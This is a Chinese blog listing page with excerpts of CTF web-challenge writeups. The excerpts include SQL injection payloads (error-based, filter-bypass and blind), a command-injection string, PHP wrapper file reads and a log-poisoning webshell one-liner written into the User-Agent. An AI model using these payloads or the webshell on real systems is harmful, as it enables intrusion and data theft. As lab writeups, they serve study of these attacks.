自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(18)
  • 资源 (2)
  • 收藏
  • 关注

原创 3种常见的报错注入

基于报错的注入1、floor()select * from test where id=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、extractvalue()select * from test where id=1 and (extractvalue(1,concat(0x7e,(select

2020-09-04 10:53:50 311

原创 [网鼎杯 2020 青龙组]AreUSerialz

考点:PHP反序列化源码:<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile";

2020-09-02 14:57:40 154

原创 [网鼎杯 2018]Fakebook

Fakebook先正常注册了一个用户名、密码和年龄都是123的用户,发现在注册的时候blog必须要一个网址才行,很明显后台做了过滤。登陆。点击123,发现url很经典。测试了一下,发现是个很简单的sql联合查询注入。这个过滤很神奇可能只是为了走个流程,过滤了union select。对!你没有看错,就是过滤了这两个单词加空格连在一起的字符串。所以我们用union/**/select就可以绕过了。注入payload为:0 union/**/select 1,database(),3,4%20fr

2020-09-01 23:09:48 962 1

原创 达芬奇密码--buuctf密码学

题目描述达芬奇一直是一个有争议的画家,科学家。。。小明为了研究他,从网上找到了名画蒙娜丽莎,一天深夜,小明突然从蒙娜丽莎背后的天空中看到了一串神秘的数字。顺带告诉小明达芬奇家窗台上有一串数字是关键。小明千里迢迢找到了这串数字,请将这个送分题做出来,亲,包邮哦(答案是一串32位十进制数字)注意:得到的 flag 请包上 flag{} 提交文件内容达芬奇隐藏在蒙娜丽莎中的数字列: 1 233 3 2584 1346269 144 5 196418 21 1597 610 377 10946 89

2020-09-01 19:50:19 6633

原创 [ZJCTF 2019]NiZhuanSiWei

源码<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&g

2020-08-31 18:08:46 152

原创 五种常见的php伪协议

1、php://input可以获取POST的数据流条件:allow_url_include=Onallow_url_fopen-Off/OnPOC:file =php://inputPOST:phpinfo();2、php://filter可以获取指定文件的源码,但是当他与包含函数结合是,php://filter流会被当做php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取条件:allow_url_fopen=Off/Onallow_url_includ

2020-08-31 17:56:24 5414 2

原创 [GYCTF2020]Ezsqli

打开靶机,查看源代码发现让post一个id过去,根据题目意思,这里应该存在sql注入由于本人习惯性喜欢使用异或进行测试,所以立刻发现这道题的注入payload,以下是测试过程:id=1^1 #Error Occured When Fetch Result.即id=0,查询无结果id=1^0 #Nu1L id=1id=1^'0' #Nu1L 数字型注入,若为单引号字符注入此处会报错bool(false)id=1^'union' #SQL Injection Checked.过滤测试通过测试发下

2020-08-31 16:29:49 486

原创 强网先锋杯部分WP

misc-签到给了flag,直接提交强网先锋-主动命令注入过滤了flag,可以用linux通配符代替,?代表任意一个字符。cat fla?.php读出来后可以在右键查看源代码中看到flag.还可以用base64、tac、sort等等payload:ip=127.0.0.1;base64%20fla?.php;强网先锋-upload流量包分析用wireshark打开流量包,按长度排序可以看到上传了一张图片,将图片保存带本地。也可以放到kali里面使用以下命令分析图片。foremos

2020-08-30 22:36:09 395

原创 [RCTF2015]EasySQL

打开靶机看到登陆和注册的链接。访问注册页面register.php,注册一个admin'"\用户 密码和邮箱为123。登陆成功到index.php,可以看到输入的信息被原封不动的插入到了数据库。点击用户名跳转到user.php,看到可以修改密码。点击change_password跳转到changepwd.php修改密码123为1234后,发现sql语句报错。You have an error in your SQL syntax; check the manual that corr

2020-08-30 21:52:49 1169

原创 [GXYCTF2019]BabySQli

原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码!随便输入一个用户名admin和密码123,提示wrong pass!输入name=aa&pw=123,提示wrong user!,说明用户名为admin。查看源代码发现一段编码:经过base32+base64解码之后得到:select * from user where username = '$name'根据题目提示:sql注入+万能密码+md5(pw)构造注入语句:aa'union

2020-08-30 16:44:44 151

原创 [极客大挑战 2019]FinalSQL

[极客大挑战 2019]FinalSQL通过?id=xxxx可以测试过滤情况、使用burpsuit的爆破模块爆破过滤情况。过滤了等号、if、union、#、空格、*等等未过滤select、^、单引号、regexp、ascii、substr、from、where等等测试payload为:?id=1^(ascii(substr(database(),1,1))>128)附上脚本import requestsimport timeurl="http://034e464a-0894-4c2

2020-08-30 15:40:27 283

原创 [CISCN2019 华北赛区 Day2 Web1]

Hack World数字型盲注 异或注入 二分法过滤了or、||、空格、#未过滤if、逗号、substr、ascill、select、from、左右括号import requestsimport timeurl="http://3820bdac-9613-4057-bfb0-5d88973f7c2d.node3.buuoj.cn/index.php"flag=""for i in range(0,50):#flag长度,跑到一半可修改此值,继续跑后边的数据 print(i,":")

2020-08-30 15:34:19 74

原创 CTFSHOW web_AK赛

CTFSHOW web_AK赛签到——观己文件包含漏洞php伪协议看源码过滤了php,开始想的是php伪协议,但是试了一下allow_url_include=off,data://用不了。最后尝试了一下直接读/flag,/flag.txt。发现在/flag.txt直接读出了flag.日志包含传?file=/var/log/nginx/access.log过去发现nginx访问日志可以访问。写一句话<? eval($_POST['hack']);?>到UA里面,go。使用蚁剑

2020-07-31 20:06:01 426

原创 ctfshow 红包题第一弹

红包题第一弹 import base64import zipfilefor i in range(1,87): with zipfile.ZipFile(str(i)+".zip",'r') as z: file = z.namelist()[0] z.extract(file)flag = ""for i in range(1,87):...

2020-07-31 19:10:24 846

原创 kali2020安装gmpy2

0x00准备配置下载源:详情见https://app.yinxiang.com/fx/da629ce0-891b-4503-9693-6d196d7f3db7下载GMP,MPFR,MPC,gmpy。我已经打包成src的压缩包准备好了。链接:https://pan.baidu.com/s/1YhgYjq-Loh5mU0K9cHls-w 提取码:ef42解压到/home目录。进入/home/src目录cd /home/src0x01安装(按顺序来,因为我也不确定会不会发生什么错

2020-05-29 13:19:15 2499

原创 python-动态最高优先数优先算法

#Author:yaoxin#time:2020-05-20,14:36import randomdef init(): #初始化就绪进程队列 start_id=1000 for i in range(10): pcd_id=start_id+i #进程ID priority=random.randint(1,10) #随机产生优先级数 arrive_time=0 .

2020-05-26 22:19:10 2188 2

原创 linux下安装EJBCA 搭建私有CA服务器----问题处理

详情看:https://app.yinxiang.com/fx/da629ce0-891b-4503-9693-6d196d7f3db7文章参考:https://www.cnblogs.com/cocoajin/p/8796807.html

2020-05-07 20:54:16 1988

原创 BJDCTF 2nd 刷题记录

misc 最简单的misc zip伪加密---------7z解压winhex打开文件发现png缺少头部正常的png加上89504e47得到图片(此处不知道为什么不能直接添加 因此winhex新建了一个文件将数据复制进去得到完整的png)从图片中得到一串16进制字符串------------16进制转文本得到flag misc a-beautiful-gril ...

2020-03-23 18:42:13 2683

Windows acunetix_13.0.200205121.rar

Windows acunetix_13.0.200205121.rar

2020-11-10

gmpy2依赖包GMP,MPFR,MPC,gmpy。

安装gmpy2时,有的依赖包下载不下来。搜集了好多博客中的下载办法下载下来的。安葬过程请看https://blog.csdn.net/yao_xin_de_yuan/article/details/106419494

2020-05-29

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除